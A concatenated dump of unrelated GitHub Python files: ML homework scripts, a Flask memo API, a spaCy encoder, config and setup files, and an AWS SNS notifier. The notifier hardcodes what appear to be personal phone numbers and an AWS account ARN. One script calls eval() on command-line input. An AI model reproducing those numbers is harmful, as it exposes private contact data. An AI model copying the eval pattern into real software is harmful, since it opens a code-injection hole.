unittest.main()\n","repo_name":"CulleyHarrelson/bot-e","sub_path":"bin/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13251578116","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math, torch, argparse\nfrom torch import nn\nfrom torch.autograd import Variable\n\n\n\ndef rand_points(n_points= 1, lb=-1, ub=1):\n return np.random.uniform(lb, ub, n_points)\n\ndef create_dataset(fx, fy, dataset_size=200, look_back=1, epsilon=0.01):\n random_x = rand_points(dataset_size, -1.5, 1.5)\n random_y = rand_points(dataset_size, -1.5, 1.5)\n\n data_in, data_out = [], []\n for x, y in zip(random_x, random_y):\n points = [(x + epsilon * fx(x, y), y + epsilon * fy(x, y))]\n\n for i in range(look_back):\n x1, y1 = points[-1]\n points.append((x1 + epsilon * u(x1, y1), y1 + epsilon * v(x1, y1)))\n\n data_in.append(points[:-1])\n data_out.append(points[1:])\n\n return np.array(data_in), np.array(data_out)\n\nclass lstm_reg(nn.Module):\n def __init__(self, n_dim, seq_len, n_hidden, n_layers=1):\n super(lstm_reg, self).__init__()\n\n self.rnn = nn.LSTM(n_dim, n_hidden, n_layers, batch_first=True)\n self.fc = nn.Linear(n_hidden * seq_len, n_dim)\n\n def forward(self, x, times=1):\n x, h = self.rnn(x)\n x = self.fc(x)\n outs = []\n outs.append(x)\n for i in range(times-1):\n x, h = self.rnn(x, h)\n x = self.fc(x)\n outs.append(x)\n if times > 1:\n return outs\n b, s, h = x.shape\n return x\n\"\"\"\nseq_len= 10\ndataset_size= 1000\nlb, ub = -1, 1\nu = lambda x, y: xfield\nv = lambda x, y: yfield\n\n#u = lambda x, y: np.sin(2*x) + np.sin(2*y)\n#v = lambda x, y: np.cos(2*y)\n\nx, y = np.meshgrid(np.linspace(lb, ub, 10), np.linspace(lb, ub, 10))\nplt.quiver(x, y, u(x, y), v(x, y))\nplt.show()\n\ndata_in, data_out = create_dataset(u, v, dataset_size, seq_len, 0.03)\ntrain_in = torch.from_numpy(data_in.reshape(-1, seq_len, 2).astype(np.float32))\ntrain_out = torch.from_numpy(data_out.reshape(-1, seq_len, 2).astype(np.float32))\ntrain_in = train_in[:800]\ntrain_out = train_out[:800]\n\nnet = lstm_reg(2, 1, 20)\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(net.parameters(), lr=2e-2)\n\nfor e in range(1000):\n out = net(train_in)\n loss = criterion(out, train_out)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (e + 1)% 100 == 0:\n print(loss)\n\nnet = net.eval()\nn_tests= 5\n\nx, y = np.meshgrid(np.linspace(lb, ub, 10), np.linspace(lb, ub, 10))\nplt.quiver(x, y, u(x, y), v(x, y))\n\nfor j in range(n_tests):\n x, y= rand_points(), rand_points()\n print(x, y)\n plt.plot(x, y, 'o')\n\n\n\nnet = net.eval()\nn_tests= 5\n\nx, y = np.meshgrid(np.linspace(lb, ub, 20), np.linspace(lb, ub, 20))\nplt.quiver(x, y, u(x, y), v(x, y))\n\nfor j in range(n_tests):\n x, y = rand_points(), rand_points()\n with torch.no_grad():\n init_point = torch.from_numpy(np.array((x, y)).reshape(1, 1, 2))\n init_point = init_point.to(torch.float32)\n\n\n all_points = net(init_point, 200)\n all_points = [x.numpy() for x in all_points]\n #for i in range(100):\n # init_point = net(init_point)\n # all_points.append(init_point.detach().numpy())\n\n all_points = np.array(all_points).reshape(-1, 2)\n plt.plot(*np.array(all_points).T)\n plt.plot(x, y, 'o', markersize=5, color=plt.gca().lines[-1].get_color())\n\nplt.show()\n\"\"\"\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='HW3 parser help')\n parser.add_argument('--param', metavar='param.json',\n help='parameter file name')\n parser.add_argument('-v', type=int, default=1, metavar='N',\n help='verbosity (default: 1)')\n parser.add_argument('--res-path', metavar='results',\n help='path of results')\n parser.add_argument('--x-field', metavar='x**2',\n help='expression of the x-component of the vector field')\n parser.add_argument('--y-field', metavar='y**2',\n help='expression of the y-component of the vector field')\n parser.add_argument('--lb', default=-1.0, metavar='LB',\n help='lower bound for initial conditions (default: -1)')\n parser.add_argument('--ub', default=1.0, metavar='UB',\n help='upper bound for initial conditions (default: 1)')\n parser.add_argument('--n-tests', default=3, metavar='N_TESTS',\n help='number of test trajectories to plot')\n args = parser.parse_args()\n\n \"\"\"\n os.chdir('param/')\n # Hyperparameters from json file\n with open(args.param) as paramfile:\n param = json.load(paramfile)\n \"\"\"\n\n lb = args.lb\n ub = args.ub\n xfield = args.x_field\n yfield = args.y_field\n ntests = args.n_tests\n\n seq_len= 10\n dataset_size= 1000\n\n u = lambda x, y: eval(xfield)\n v = lambda x, y: eval(yfield)\n print(1)\n #u = lambda x, y: np.sin(2*x) + np.sin(2*y)\n #v = lambda x, y: np.cos(2*y)\n\n x, y = np.meshgrid(np.linspace(lb, ub, 10), np.linspace(lb, ub, 10))\n plt.quiver(x, y, u(x, y), v(x, y))\n plt.show()\n\n data_in, data_out = create_dataset(u, v, dataset_size, seq_len, 0.03)\n train_in = torch.from_numpy(data_in.reshape(-1, seq_len, 2).astype(np.float32))\n train_out = torch.from_numpy(data_out.reshape(-1, seq_len, 2).astype(np.float32))\n train_in = train_in[:800]\n train_out = train_out[:800]\n\n net = lstm_reg(2, 1, 20)\n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(net.parameters(), lr=2e-2)\n\n for e in range(1000):\n out = net(train_in)\n loss = criterion(out, train_out)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (e + 1)% 100 == 0:\n print(loss)\n\n\n\n net = net.eval()\n n_tests= 5\n print(2)\n x, y = np.meshgrid(np.linspace(lb, ub, 20), np.linspace(lb, ub, 20))\n plt.quiver(x, y, u(x, y), v(x, y))\n\n for j in range(n_tests):\n x, y = rand_points(), rand_points()\n with torch.no_grad():\n init_point = torch.from_numpy(np.array((x, y)).reshape(1, 1, 2))\n init_point = init_point.to(torch.float32)\n\n\n all_points = net(init_point, 200)\n all_points = [x.numpy() for x in all_points]\n #for i in range(100):\n # init_point = net(init_point)\n # all_points.append(init_point.detach().numpy())\n\n all_points = np.array(all_points).reshape(-1, 2)\n plt.plot(*np.array(all_points).T)\n plt.plot(x, y, 'o', markersize=5, color=plt.gca().lines[-1].get_color())\n\n os.chdir('plots/')\n plt.savefig(\"Hegdeplot.pdf\")\n plt.show()\n print(3)\n","repo_name":"shivi47/PHYS-490-Machine-Learning","sub_path":"HW3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6581214709","text":"#coding=utf-8\n\nimport codecs\nimport json\n\nclass Config(dict):\n\tdef load(self, fileName):\n\t\tself.fileName = fileName\n\t\t# 讓預設值為 True\n\t\tself.update({\n\t\t\t'switch': True,\n\t\t\t'backgroundReading': True,\n\t\t\t'readChat': True,\n\t\t\t'readChatSender': False,\n\t\t\t'readChatGiftSponser': True,\n\t\t\t'omitChatGraphic': True,\n\t\t\t'infoCardPrompt': True,\n\t\t\t'readChapter': True,\n\t\t\t'checkUpdateAutomatic': True,\n\t\t\t'skipVersion': '0'\n\t\t})\n\t\t# 從使用者設定檔取得開關狀態\n\t\ttry:\n\t\t\twith codecs.open(fileName) as file:\n\t\t\t\tself.update(json.load(file))\n\t\t\t\n\t\texcept:\n\t\t\tpass\n\t\t\n\t\n\tdef write(self):\n\t\twith codecs.open(self.fileName, 'w+', encoding='utf-8') as file:\n\t\t\tjson.dump(self, file, ensure_ascii=False)\n\t\t\n\t\n\nconf = Config()\n","repo_name":"maxe-hsieh/subtitle_reader","sub_path":"addon/globalPlugins/subtitle_reader/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"31"} +{"seq_id":"22821282706","text":"from functools import partial\n\nfrom torchnlp.encoders.text.static_tokenizer_encoder import StaticTokenizerEncoder\n\n\ndef _tokenize(s, tokenizer):\n return [w.text for w in tokenizer(s)]\n\n\nclass SpacyEncoder(StaticTokenizerEncoder):\n \"\"\" Encodes the text using spaCy's tokenizer.\n\n **Tokenizer Reference:**\n https://spacy.io/api/tokenizer\n\n Args:\n **args: Arguments passed onto ``StaticTokenizerEncoder.__init__``.\n language (string, optional): Language to use for parsing. Accepted values\n are 'en', 'de', 'es', 'pt', 'fr', 'it', 'nl' and 'xx'.\n For details see https://spacy.io/models/#available-models\n **kwargs: Keyword arguments passed onto ``StaticTokenizerEncoder.__init__``.\n Example:\n\n >>> encoder = SpacyEncoder([\"This ain't funny.\", \"Don't?\"])\n >>> encoder.encode(\"This ain't funny.\")\n tensor([5, 6, 7, 8, 9])\n >>> encoder.vocab\n ['', '', '', '', '', 'This', 'ai', \"n't\", 'funny', '.', 'Do', '?']\n >>> encoder.decode(encoder.encode(\"This ain't funny.\"))\n \"This ai n't funny .\"\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n if 'tokenize' in kwargs:\n raise TypeError('``SpacyEncoder`` does not take keyword argument ``tokenize``.')\n\n try:\n import spacy\n except ImportError:\n print(\"Please install spaCy: \" \"`pip install spacy`\")\n raise\n\n # Use English as default when no language was specified\n language = kwargs.get('language', 'en')\n\n # All languages supported by spaCy can be found here:\n # https://spacy.io/models/#available-models\n supported_languages = ['en', 'de', 'es', 'pt', 'fr', 'it', 'nl', 'xx']\n\n if language in supported_languages:\n # Load the spaCy language model if it has been installed\n try:\n self.spacy = spacy.load(language, disable=['parser', 'tagger', 'ner'])\n except OSError:\n raise ValueError((\"Language '{0}' not found. Install using \"\n \"spaCy: `python -m spacy download {0}`\").format(language))\n else:\n raise ValueError(\n (\"No tokenizer available for language '%s'. \" + \"Currently supported are %s\") %\n (language, supported_languages))\n\n super().__init__(*args, tokenize=partial(_tokenize, tokenizer=self.spacy), **kwargs)\n\n def batch_encode(self, sequences):\n # Batch tokenization is handled by ``self.spacy.pipe``\n original = self.tokenize\n self.tokenize = lambda sequence: [token.text for token in sequence]\n return_ = super().batch_encode(self.spacy.pipe(sequences))\n self.tokenize = original\n return return_\n","repo_name":"PetrochukM/PyTorch-NLP","sub_path":"torchnlp/encoders/text/spacy_encoder.py","file_name":"spacy_encoder.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":2198,"dataset":"github-code","pt":"31"} +{"seq_id":"23724853704","text":"import boto3\n\ndef notify(message):\n boto = boto3.setup_default_session(profile_name='di')\n client = boto3.client('sns',\n region_name=\"us-east-1\")\n\n #arn:aws:sns:us-east-1:178603499269:TwitterStream\n\n # Send your sms message.\n try:\n r = client.publish(\n PhoneNumber=\"+12067553147\",\n Message=message\n )\n #print(r)\n return r\n except Exception as e:\n print(e)\n return e\n\n # Send your sms message.\n client.publish(\n PhoneNumber=\"+13023771148\",\n Message=message\n )","repo_name":"tttrinter/TwitterStreaming","sub_path":"Manager/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14545115812","text":"import os\nimport shutil\nfrom werkzeug.datastructures import FileStorage\nfrom werkzeug.utils import secure_filename\nfrom gogglekaap.models.memo import Memo as MemoModel\nfrom gogglekaap.models.user import User as UserModel\nfrom gogglekaap.models.label import Label as LabelModel\nfrom flask_restx import Namespace, Resource, fields, reqparse, inputs\nfrom flask import g, current_app\n\nns = Namespace(\n 'memos',\n description='메모 관련 API'\n)\n\nlabel = ns.model('Label', {\n 'id': fields.Integer(required=True, description='라벨 고유 아이디'),\n 'content': fields.String(required=True, description='라벨 내용'),\n})\n\nmemo = ns.model('Memo', {\n 'id': fields.Integer(required=True, description='메모 고유 아이디'),\n 'user_id': fields.Integer(required=True, description='메모 작성자 유저 고유 번호'),\n 'title': fields.String(required=True, description='메모 제목'),\n 'content': fields.String(required=True, description='메모 내용'),\n 'linked_image': fields.String(required=False, description='메모 이미지'),\n 'is_deleted': fields.Boolean(description='메모 삭제 상태'),\n 'labels': fields.List(fields.Nested(label), description='연결된 라벨'),\n 'created_at': fields.DateTime(description='작성일'),\n 'updated_at': fields.DateTime(description='변경일')\n})\n\n\nparser = reqparse.RequestParser()\nparser.add_argument('title', required=True, help='메모 제목')\nparser.add_argument('content', required=True, help='메모 내용')\nparser.add_argument('linked_image', location='files', type=FileStorage, required=False, help='메모 이미지')\nparser.add_argument('is_deleted', required=False, type=inputs.boolean, help=\"메모 삭제 상태\")\nparser.add_argument('labels', action='split', help=\"라벨 내용 콤마 스트링\")\n\nput_parser = parser.copy()\nput_parser.replace_argument('title', required=False, help='메모 제목')\nput_parser.replace_argument('content', required=False, help='메모 내용')\n\nget_parser = reqparse.RequestParser()\nget_parser.add_argument('page', required=False, type=int, help='메모 페이지 번호')\nget_parser.add_argument('needle', required=False, location='args', help='메모 검색어')\nget_parser.add_argument('is_deleted', required=False, type=inputs.boolean, help=\"메모 삭제 상태\")\nget_parser.add_argument('label', required=False, help='라벨 내용')\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in {\n 'jpg',\n 'jpeg',\n 'png',\n 'gif'\n }\n\ndef randomword(length):\n import random, string\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(length))\n\ndef save_file(file):\n if file.filename == '':\n ns.abort(400)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n relative_path = os.path.join(\n current_app.static_url_path[1:],\n current_app.config['USER_STATIC_BASE_DIR'],\n g.user.user_id,\n 'memos',\n randomword(10),\n filename\n )\n upload_path = os.path.join(\n current_app.root_path,\n relative_path\n )\n os.makedirs(\n os.path.dirname(upload_path),\n exist_ok=True\n )\n file.save(upload_path)\n return relative_path, upload_path\n else:\n ns.abort(400)\n\n@ns.route(\"\")\nclass MemoList(Resource):\n @ns.marshal_list_with(memo, skip_none=True)\n @ns.expect(get_parser)\n def get(self):\n '''메모 복수 조회'''\n args = get_parser.parse_args()\n needle = args['needle']\n page = args['page']\n per_page = 15\n is_deleted = args['is_deleted']\n label = args['label']\n if is_deleted is None:\n is_deleted = False\n base_query = MemoModel.query.join(\n UserModel,\n UserModel.id == MemoModel.user_id\n ).filter(\n UserModel.id == g.user.id,\n MemoModel.is_deleted == is_deleted\n )\n if needle:\n needle = f'%%{needle}%%'\n base_query = base_query.filter(\n MemoModel.title.ilike(needle)|MemoModel.content.ilike(needle)\n )\n if label:\n base_query = base_query.filter(\n MemoModel.labels.any(LabelModel.id == label)\n )\n\n pages = base_query.order_by(\n MemoModel.created_at.desc()\n ).paginate(\n per_page=per_page,\n page=page\n )\n return pages.items\n\n @ns.marshal_list_with(memo, skip_none=True)\n @ns.expect(parser)\n def post(self):\n '''메모 생성'''\n args = parser.parse_args()\n memo = MemoModel(\n title=args['title'],\n content=args['content'],\n user_id=g.user.id\n )\n if args['is_deleted'] is not None:\n memo.is_deleted = args['is_deleted']\n file = args['linked_image']\n if file:\n relative_path, _ = save_file(file)\n memo.linked_image = relative_path\n labels = args['labels']\n if labels:\n for cnt in labels:\n if cnt:\n label = LabelModel.query.filter(\n LabelModel.content == cnt,\n LabelModel.user_id == g.user.id\n ).first()\n if not label:\n label = LabelModel(\n content=cnt,\n user_id=g.user.id\n )\n memo.labels.append(label)\n g.db.add(memo)\n g.db.commit()\n return memo, 201\n\n\n@ns.param(\"id\", '메모 고유 번호')\n@ns.route(\"/\")\nclass Memo(Resource):\n @ns.marshal_list_with(memo, skip_none=True)\n def get(self, id):\n '''메모 단수 조회'''\n memo = MemoModel.query.get_or_404(id)\n if g.user.id != memo.user_id:\n ns.abort(403)\n return memo\n\n @ns.marshal_with(memo, skip_none=True)\n @ns.expect(put_parser)\n def put(self, id):\n '''메모 업데이트'''\n args = put_parser.parse_args()\n memo = MemoModel.query.get_or_404(id)\n if g.user.id != memo.user_id:\n ns.abort(403)\n if args['title'] is not None:\n memo.title = args['title']\n if args['content'] is not None:\n memo.content = args['content']\n if args['is_deleted'] is not None:\n memo.is_deleted = args['is_deleted']\n file = args['linked_image']\n if file:\n relative_path, upload_path = save_file(file)\n if memo.linked_image:\n origin_path = os.path.join(\n current_app.root_path,\n memo.linked_image\n )\n if origin_path != upload_path:\n if os.path.isfile(origin_path):\n shutil.rmtree(os.path.dirname(origin_path))\n memo.linked_image = relative_path\n labels = args['labels']\n if labels:\n memo.labels.clear()\n for cnt in labels:\n if cnt:\n label = LabelModel.query.filter(\n LabelModel.content == cnt,\n LabelModel.user_id == g.user.id\n ).first()\n if not label:\n label = LabelModel(\n content=cnt,\n user_id=g.user.id\n )\n memo.labels.append(label)\n\n\n g.db.commit()\n return memo\n\n def delete(self, id):\n '''메모 삭제'''\n memo = MemoModel.query.get_or_404(id)\n if memo.user_id != g.user.id:\n ns.abort(403)\n g.db.delete(memo)\n g.db.commit()\n return '', 204\n\n@ns.route('//image')\n@ns.param('id', 'The memo identifier')\nclass MemoImage(Resource):\n\n def delete(self, id):\n '''메모 이미지 삭제'''\n memo = MemoModel.query.get_or_404(id)\n if g.user.id != memo.user_id:\n ns.abort(403)\n if memo.linked_image:\n origin_path = os.path.join(\n current_app.root_path,\n memo.linked_image\n )\n if os.path.isfile(origin_path):\n shutil.rmtree(os.path.dirname(origin_path))\n memo.linked_image = None\n g.db.commit()\n return '', 204\n","repo_name":"hidekuma/gogglekaap","sub_path":"gogglekaap/apis/memo.py","file_name":"memo.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"70029922010","text":"\narr = [int(x[:-1]) for x in open(\"/home/comrade/Funstuff/adventofcode2020/1/input.txt\").readlines()]\n\ndef twosum(sumval):\n hm = set()\n for x in range(len(arr)):\n needed = sumval-arr[x]\n if needed in hm:\n return needed,arr[x]\n hm.add(arr[x])\n return 0,0\n\nfor x in arr:\n v1,v2 = twosum(2020-x)\n if v1!=0:\n print(x,v1,v2)\n","repo_name":"c0mr4d3/adventofcode2020","sub_path":"1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43476706117","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nadmin.autodiscover()\nfrom qa.views import test, new_questions, popular_questions, one_question, ask, answer, signup, login\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'ask.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^$', 'qa.views.new_questions'),\n url(r'login/$', 'qa.views.login', name='login'),\n url(r'signup/$', 'qa.views.signup', name='signup'),\n url(r'ask/$', 'qa.views.ask', name='ask'),\n url(r'answer/$', 'qa.views.answer', name='anwer'),\n url(r'popular/$', 'qa.views.popular_questions', name='popular'),\n url(r'new/$', 'qa.views.new_questions', name='new'),\n url(r'question/(?P\\d+)/$', 'qa.views.one_question', name='question'),\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"pythonidea/webMaster","sub_path":"ask/ask/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14471587268","text":"from typing import List\nfrom setuptools import find_packages, setup\n\n# function to get requirements as a list\ndef get_requirements()->List[str]:\n \"\"\"\n Returns list of requirements\n \"\"\"\n requirements = []\n with open('requirements.txt', 'r') as req:\n content = req.read()\n\n for req in content.split('\\n'):\n requirements.append(req)\n\n return requirements\n\n# setup definition\nsetup(\n name=\"sensor\",\n version=\"0.0.1\",\n author=\"Saurabh Bhardwaj\",\n author_email=\"aryan.saurabhbhardwaj@gmail.com\",\n packages = find_packages(),\n install_requires=get_requirements(),\n)\n","repo_name":"Bhardwaj-Saurabh/Sensor_Fault_Detection_Scania","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16848893678","text":"import argparse\nimport logging\nimport os\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import randint\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import (\n GridSearchCV,\n RandomizedSearchCV,\n StratifiedShuffleSplit,\n train_test_split,\n)\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import OneHotEncoder, StandardScaler\nfrom sklearn.tree import DecisionTreeRegressor\n\nfrom logger_main import configure_logger\n\nlogger = logging.getLogger(__name__)\n\nif __name__ == '__main__':\n \n # Use argparser to get the user command line input such as where to store data and pickle model\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--dataset', dest=\"dataset\", type=str, default='./data/raw/housing.csv',\n help='Path to dataset')\n parser.add_argument('--model-output', dest=\"model_output\", type=str, default='./artifacts',\n help='Output folder path for trained model')\n parser.add_argument('--log-level', dest=\"log_level\", type=str, default='DEBUG',\n help='Specify log level. e.g. `--log-level DEBUG, default is DEBUG')\n parser.add_argument('--log-path', dest=\"log_path\", type=str, default=False,\n help='use a log file or not. if yes give path,e.g. `--log-path ,default is not log file')\n parser.add_argument('--no-console-log', dest=\"log_console\", action=\"store_true\",\n help='toggle whether or not to write logs to the console')\n args = parser.parse_args()\n\n # Based on the user input from the terminal, set the file path and console output true/false\n\n if args.log_path is not False:\n log_file_path = os.path.join(args.log_path, 'log_file.log')\n else:\n log_file_path = None\n if args.log_console is True:\n console_input = False\n else:\n console_input = True\n \n # Configure the logger based on the user input from the terminal\n\n configure_logger(logger=None, cfg=None, log_file=log_file_path, console=console_input, log_level=args.log_level)\n\n housing = pd.read_csv(args.dataset)\n\n train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n\n housing[\"income_cat\"] = pd.cut(housing[\"median_income\"],\n bins=[0., 1.5, 3.0, 4.5, 6., np.inf], labels=[1, 2, 3, 4, 5])\n\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\n\n for train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n \n # visualize the housing data using lat and long\n \n housing = strat_train_set.copy()\n housing.plot(kind=\"scatter\", x=\"longitude\", y=\"latitude\")\n housing.plot(kind=\"scatter\", x=\"longitude\", y=\"latitude\", alpha=0.1)\n # Correlation matrix for housing\n corr_matrix = housing.corr()\n corr_matrix[\"median_house_value\"].sort_values(ascending=False)\n # select the numerical only data\n housing = strat_train_set.drop(\"median_house_value\", axis=1)\n housing_num = housing.drop('ocean_proximity', axis=1)\n \n # custom transformer for the new features mentioned above\n\n rooms_ix, bedrooms_ix, population_ix, households_ix = 3, 4, 5, 6\n\n class CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n def __init__(self, add_bedrooms_per_room=True):\n self.add_bedrooms_per_room = add_bedrooms_per_room\n\n def fit(self, X, y=None):\n return self\n \n def transform(self, X, y=None):\n rooms_per_household = X[:, rooms_ix] / X[:, households_ix]\n population_per_household = X[:, population_ix] / X[:, households_ix]\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n return np.c_[X, rooms_per_household, population_per_household, bedrooms_per_room]\n attr_adder = CombinedAttributesAdder()\n housing_extra_attribs = attr_adder.transform(housing.values) \n housing_extra_attribs = pd.DataFrame(housing_extra_attribs,\n columns=list(housing.columns) \n + [\"rooms_per_household\", \"population_per_household\", \"bedrooms_per_room\"],\n index=housing.index)\n # pipe line to impute,add new attribute and sclar transfromation\n\n num_pipeline = Pipeline([('imputer', SimpleImputer(strategy=\"median\")),\n ('attribs_adder', CombinedAttributesAdder()), \n ('std_scaler', StandardScaler())])\n \n housing_num_tr = num_pipeline.fit_transform(housing_num)\n # drop labels for training set\n housing = strat_train_set.drop(\"median_house_value\", axis=1) \n housing_labels = strat_train_set[\"median_house_value\"].copy()\n # column transformer to combine both num and cat columns\n num_attribs = list(housing_num)\n cat_attribs = [\"ocean_proximity\"]\n full_pipeline = ColumnTransformer([(\"num\", num_pipeline, num_attribs),\n (\"cat\", OneHotEncoder(), cat_attribs),])\n \n # final test data and lables for training are\n\n housing_prepared = full_pipeline.fit_transform(housing)\n housing_labels = strat_train_set[\"median_house_value\"].copy()\n\n lin_reg = LinearRegression()\n lin_reg.fit(housing_prepared, housing_labels)\n\n tree_reg = DecisionTreeRegressor(random_state=42)\n tree_reg.fit(housing_prepared, housing_labels)\n\n # random forest regressor with randomized search method\n forest_reg = RandomForestRegressor(random_state=42)\n param_distribs = {'n_estimators': randint(low=1, high=200), 'max_features': randint(low=1, high=8)}\n\n rnd_search = RandomizedSearchCV(forest_reg, param_distributions=param_distribs,\n n_iter=10, cv=5, scoring='neg_mean_squared_error', random_state=42)\n rnd_search.fit(housing_prepared, housing_labels)\n\n # random forest regressor with grid search method\n param_grid = [{'n_estimators': [3, 10, 30], 'max_features': [2, 4, 6, 8]},\n {'bootstrap': [False], 'n_estimators': [3, 10], 'max_features': [2, 3, 4]}\n ]\n forest_reg = RandomForestRegressor(random_state=42)\n \n grid_search = GridSearchCV(forest_reg, param_grid, cv=5, scoring='neg_mean_squared_error', return_train_score=True)\n grid_search.fit(housing_prepared, housing_labels)\n\n feature_importances = grid_search.best_estimator_.feature_importances_\n\n sorted(feature_importances, reverse=True)\n\n # store the models in to the user defined/artifacts folder\n\n def store_model(model_dir):\n \"\"\"\n Function to store the model files in to the user defined folder\n\n parameters\n ----------\n model_dir: directory path\n Directory where models will bestored\n\n returns\n ------\n Following models are generated,\n linear regression\n tree regression\n random serachCV\n gridsearchCV\n\n notes\n -----\n models are stored in .pkl extension [pickle files]\n \n \"\"\"\n os.makedirs(model_dir, exist_ok=True)\n with open(os.path.join(model_dir, 'lin_reg.pkl'), 'wb') as f:\n pickle.dump(lin_reg, f)\n with open(os.path.join(model_dir, 'tree_reg.pkl'), 'wb') as f:\n pickle.dump(tree_reg, f)\n with open(os.path.join(model_dir, 'rnd_search.pkl'), 'wb') as f:\n pickle.dump(rnd_search, f)\n with open(os.path.join(model_dir, 'grid_search.pkl'), 'wb') as f:\n pickle.dump(grid_search, f)\n # call the model function to generate and store the models\n store_model(args.model_output)\n","repo_name":"genuinesaravanan/mle-training","sub_path":"src/housing/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1019750173","text":"from Layout.Method_Class.logger import Logger\r\nfrom Layout.Ui_Layout.IB.Ui_ib_setting import Ui_ib_setting\r\nfrom PyQt6.QtWidgets import QDialog, QMessageBox\r\nimport json\r\nimport os\r\n\r\n\r\nclass IB_setting(QDialog, Ui_ib_setting):\r\n def __init__(self):\r\n super().__init__()\r\n # use the Ui_login_form\r\n Logger().info('IB Setting Page Loading')\r\n self.file_path = 'ib_setting.json'\r\n self.ui = Ui_ib_setting()\r\n self.ui.setupUi(self)\r\n self.setup()\r\n\r\n def setup(self):\r\n self.ui.IB_SAVE.clicked.connect(self.save)\r\n self.reload()\r\n\r\n def reload(self):\r\n if os.path.exists(self.file_path):\r\n with open(self.file_path, 'r') as file:\r\n data = json.load(file)\r\n self.ui.IB_API_textedit.setText(data.get('api', ''))\r\n\r\n def save(self):\r\n try:\r\n self.text = self.ui.IB_API_textedit.text()\r\n data = {\r\n 'api': self.text\r\n }\r\n with open('ib_setting.json', 'w') as file:\r\n json.dump(data, file)\r\n Logger().info('Saved IB_Setting')\r\n QMessageBox.information(None, 'Save IB Setting', 'Saved Success')\r\n except Exception as e:\r\n Logger().error(f\"IB Setting Error : {e}\")\r\n QMessageBox.warning(None, 'System Error', str(e))\r\n","repo_name":"domainyman/Stock_backtest_py","sub_path":"Layout/SubLayout/IB/IB_setting.py","file_name":"IB_setting.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72554466009","text":"#===============================================================================\n# Bitwise Logical Operation Module Test\n#===============================================================================\n\nfrom pymtl3 import *\nfrom pymtl3.stdlib.test_utils import run_test_vector_sim\nfrom sim.bitwise_operation_unit import BitwiseOperationUnit\n\ndef test_and_operation(cmdline_opts):\n logic_module = BitwiseOperationUnit()\n run_test_vector_sim(logic_module, [\n ('operandA operandB control result*'),\n (0xffffffff, 0x0, 0x0, 0x0),\n (0xffffffff, 0xffffffff, 0x0, 0xffffffff),\n (0x5, 0x2, 0x0, 0x0),\n (0x7, 0x3, 0x0, 0x3)\n ], cmdline_opts)\n\ndef test_or_operation(cmdline_opts):\n logic_module = BitwiseOperationUnit()\n run_test_vector_sim(logic_module, [\n ('operandA operandB control result*'),\n (0xffffffff, 0x0, 0x1, 0xffffffff),\n (0x5, 0x2, 0x1, 0x7),\n (0x7, 0x3, 0x1, 0x7),\n (0x0, 0x0, 0x1, 0x0)\n ], cmdline_opts)\n\ndef test_xor_operation(cmdline_opts):\n logic_module = BitwiseOperationUnit()\n run_test_vector_sim(logic_module, [\n ('operandA operandB control result*'),\n (0xffffffff, 0xffffffff, 0x2, 0x0),\n (0x5, 0x2, 0x2, 0x7),\n (0x7, 0x3, 0x2, 0x4),\n (0x0, 0x0, 0x2, 0x0)\n ], cmdline_opts)\n\ndef test_edge_cases(cmdline_opts):\n logic_module = BitwiseOperationUnit()\n 